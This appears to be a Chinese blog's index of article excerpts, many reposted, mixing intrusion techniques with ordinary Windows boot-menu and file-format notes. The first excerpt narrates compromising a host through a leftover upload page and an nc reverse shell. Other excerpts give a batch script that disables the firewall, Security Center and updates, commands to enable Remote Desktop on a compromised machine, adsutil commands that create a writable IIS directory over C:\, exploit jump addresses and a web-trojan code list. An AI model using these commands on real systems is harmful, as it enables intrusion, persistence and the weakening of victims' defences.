利用ORACLE系統(tǒng)賬戶默認(rèn)口令提升權(quán)限(ZT)
摘要:
近日,偶到一主機(jī)上逛了一圈。主機(jī)的配置還算是安全,偏偏一個(gè)比較隱藏的目錄下殘留了upfile.asp,結(jié)果輕輕松松的得到了webshell。
接著在主機(jī)上逛了逛,拿出superscan從外面掃了下,只開放了80端口。從user\程序目錄里,發(fā)現(xiàn)有一快捷方式:firecontrol,好象是某款硬件防火墻的控制臺(tái)。WEBSHELL下檢測了下開放的服務(wù),發(fā)現(xiàn)一般的可提權(quán)的方法都不可行,無SERV-U等等,主機(jī)的補(bǔ)丁也是打到了最新。試了下傳了個(gè)NC上去,反連接得到一SHELL,這下比在老兵的管理器里舒服多了。
在C盤下看到一個(gè)目錄oracle,看了下C:\oracle\ora81\network\ADMIN\tnsnames.ora文件,確定了主機(jī)的服務(wù)名“xxx”,看了下版本“oracle 8i”,用數(shù)據(jù)庫連接器
.............
閱讀全文
命令行添加程序到windows默認(rèn)防火墻
摘要: @echo off
net stop "Security Center"
net stop SharedAccess
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f
閱讀全文
“PE文件格式”1.9版 完整譯文(附注釋)
摘要: 標(biāo) 題: 【翻譯】“PE文件格式”1.9版 完整譯文(附注釋)
作 者: ah007
時(shí) 間: 2006-02-28,13:32
鏈 接: http://bbs.pediy.com/showthread.php?threadid=21932
$Id: pe.txt,v 1.9 1999/03/20 23:55:09 LUEVELSMEYER Exp $
PE文件格式系列譯文之一----
【翻譯】“PE文件格式”1.9版 完整譯文(附注釋)
=========================================================
原著:Bernd. Luevelsmeyer
翻譯:ah007
[注意:本譯文的所有大小標(biāo)題序號(hào)都是譯者添加,以方便大家閱讀。圓圈內(nèi)的數(shù)字是注釋的編號(hào),其中注釋②譯自微軟的《PECOFF規(guī)范》,其它譯自網(wǎng)絡(luò)。----譯者]
.........
閱讀全文
腳本加密方法大全(ZT)
摘要: 本文一共介紹了七種方法:
一:最簡單的加密解密
二:轉(zhuǎn)義字符"\"的妙用
三:使用Microsoft出品的腳本編碼器Script Encoder來進(jìn)行編碼 (自創(chuàng)簡單解碼)
四:任意添加NUL空字符(十六進(jìn)制00H) (自創(chuàng))
...................
閱讀全文
一些opcodes(ZT)
摘要: 近日在寫exploit的時(shí)候需要用到一些其他語言的call ebx的跳轉(zhuǎn)地址,但是metasploit的opcode DB沒有包括繁體中文、日文、韓文機(jī)器的跳轉(zhuǎn)地址,所以費(fèi)了點(diǎn)時(shí)間收集了下,在這里要感謝傲少提供的機(jī)器給我去找地址。現(xiàn)在貼到這里,方便大家。
簡體中文windows的通用跳轉(zhuǎn)地址:(2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
0x7ffa4a1b jmp ebx \xff\xe3
..............
閱讀全文
開3389的幾種方法(留帖備查)
摘要: 1.打開記事本,編輯內(nèi)容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好后存為BAT文件,上傳至肉雞,執(zhí)行。這里值得注意的是要確定winnt是否在c盤,如果在其他盤則需要改動(dòng)。
...................
閱讀全文
adsutil.vbs
摘要: web 和 數(shù)據(jù)分離,有Pcanywhere,數(shù)據(jù)庫服務(wù)器有 IIS,
cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings 得到第一個(gè)Web服務(wù)的端口
cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/1/root/wodexi/ IisWebVirtualDir創(chuàng)建一個(gè)虛擬目錄wodexi
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/path c:\ 設(shè)置路徑
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/accesswrite 1設(shè)置寫權(quán)限
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi
閱讀全文
掛馬代碼大全(ZT)
摘要: 一:框架掛馬
二:js文件掛馬
首先將以下代碼
document.write("
");
保存為xxx.js,
則JS掛馬代碼為
三:js變形加密
muma.txt可改成任意后綴
.............
閱讀全文
水果機(jī)密碼解碼 "密碼公式" 看了就知道怎么打暴機(jī)了(ZT)
摘要: 笨驢的老虎機(jī)一共有7個(gè)賭項(xiàng),分別是:
bar,賠率50,出現(xiàn)概率1/22(不明白為什么用這個(gè)詞,英語達(dá)人來講講,偶門家鄉(xiāng)管這個(gè)叫大50);
77,賠率30,出現(xiàn)概率1/11;
西瓜,賠率10,出現(xiàn)概率1/11;
星星,賠率8,出現(xiàn)概率3/22;
鈴當(dāng),賠率6,出現(xiàn)概率3/22;
木瓜,賠率4,出現(xiàn)概率2/11;
蘋果,賠率2,出現(xiàn)概率3/11;
...................
閱讀全文
用ntfs流隱藏文件(zt)
摘要: 大家把ntfs分區(qū)上的文件拷貝到非ntfs分區(qū)上時(shí), 可能偶爾遇到過下面的情況, 系統(tǒng)提示會(huì)有數(shù)據(jù)丟失, 這是怎么回事呢?
實(shí)際上ntfs文件系統(tǒng)引入了"流"這個(gè)概念, 每個(gè)文件都可以有多個(gè)流, 而我們一般只使用了一個(gè), 通過給文件分配更多的流, 可以實(shí)現(xiàn)某種意義上的"文件隱藏". 例如可以控制臺(tái)中使用下面的命令建立一個(gè)文本文件:
dir d:>abc.txt
............
閱讀全文
冰刃IceSword FAQ 進(jìn)程、端口、服務(wù)篇(ZT)
摘要: 問:現(xiàn)在進(jìn)程端口工具很多,什么要使用IceSword?
答:1、絕大多數(shù)所謂的進(jìn)程工具都是利用Windows的Toolhlp32或psapi再或ZwQuerySystemInformation系統(tǒng)調(diào)用(前二者最終也用到此調(diào)用)來編寫,隨便一個(gè)ApiHook就可輕輕松松干掉它們,更不用說一些內(nèi)核級(jí) 后門了;極少數(shù)工具利用內(nèi)核線程調(diào)度結(jié)構(gòu)來查詢進(jìn)程,這種方案需要硬編碼,不僅不同
版本系統(tǒng)不同,打個(gè)補(bǔ)丁也可能需要升級(jí)程序,并且現(xiàn)在有人也提出過防止此
種查找的方法。而IceSword的進(jìn)程查找核心態(tài)方案是目前獨(dú)一無二的,并且
充分考慮內(nèi)核后門可能的隱藏手段,目前可以查出所有隱藏進(jìn)程。
2、絕大多數(shù)工具查找進(jìn)程路徑名也是通過Toolhlp32、psapi,前者會(huì)調(diào)用RtlDebug***函數(shù)向目標(biāo)注入遠(yuǎn)線程,后者會(huì)用調(diào)試api讀取目標(biāo)進(jìn)程內(nèi)存,本質(zhì)上都是對(duì)PEB的枚舉,前面我的blog提到過輕易修改PEB就讓這些工具找不到 北了。而IceSword的核心態(tài)方案原原本本地將全路徑展示,就算運(yùn)行時(shí)剪切到其他路徑也會(huì)隨之顯示。
3、進(jìn)程dll
閱讀全文
Vista啟動(dòng)菜單的多個(gè)問題
摘要: 經(jīng)歷了上次的"Acronis os selector 引發(fā)系統(tǒng)不能啟動(dòng)"事件后,我的vista也廢了,恢復(fù)過程中碰到多個(gè)問題,記錄一下以備查閱
C盤 Windows2003
D盤 Windows Vista
E盤 Ubuntu
F盤 數(shù)據(jù),軟件等
我先Ghost恢復(fù)了Windows2003,再恢復(fù)Ubuntu,由于Vista在Ghost備份之后加了很多東西,夢幻桌面,收音機(jī)等很多側(cè)邊欄等等的工具,沒有進(jìn)行Ghost恢復(fù),使用Vista PE啟動(dòng)光盤啟動(dòng),有個(gè)修復(fù)Vista啟動(dòng)項(xiàng)的程序,修復(fù)重啟(應(yīng)該是此時(shí)生成了BCD數(shù)據(jù)庫),發(fā)現(xiàn)只能進(jìn)Windows Vista,沒有Windows2003的多啟動(dòng)菜單了,再次使用Vista PE啟動(dòng)光盤啟動(dòng),修改BCD數(shù)據(jù)庫文件,執(zhí)行如下命令
bcdedit /create {ntldr} /d "Windows 2003"
bcdedit /set {ntldr} device partition=C:
bcdedit /set {ntldr} path \ntldr
閱讀全文
更改驅(qū)動(dòng)器號(hào)
摘要: HKEY_LOCAL_MACHINE\SYSTEM\MountedDevices
一看就明白
閱讀全文
教你如何雙啟動(dòng)Windows XP和Windows Vista(ZT)
摘要: 假如你認(rèn)為安裝一個(gè)Windows操作系統(tǒng)不夠用,或者你感覺生活中的麻煩還不夠多,那就同時(shí)安裝Windows XP和Windows Vista系統(tǒng)吧。
為什么不呢?坦率的說,我不知道為什么有人想這么做。正如在上一篇博客中提到的那樣,Windows Vista對(duì)于MBR(主引導(dǎo)記錄)的支配地位,使得處理器十分排外。一旦電腦上安裝了Vista,用戶 就必須按照Vista制定的規(guī)則來操作電腦。
硬盤分區(qū)
...........
閱讀全文
解決Vista的多啟動(dòng)菜單
摘要: 同樣,網(wǎng)上講的,大多數(shù)是垃圾
比如C盤有個(gè)Win2k3,使用Vista PE啟動(dòng),使用命令行執(zhí)行如下命令
bcdedit /create {ntldr} /d "Windows 2003"
bcdedit /set {ntldr} device partition=C:
bcdedit /set {ntldr} path \ntldr
bcdedit /displayorder {ntldr} -addlast
以上是我碰到的Vista啟動(dòng)菜單問題的解決方法
............
閱讀全文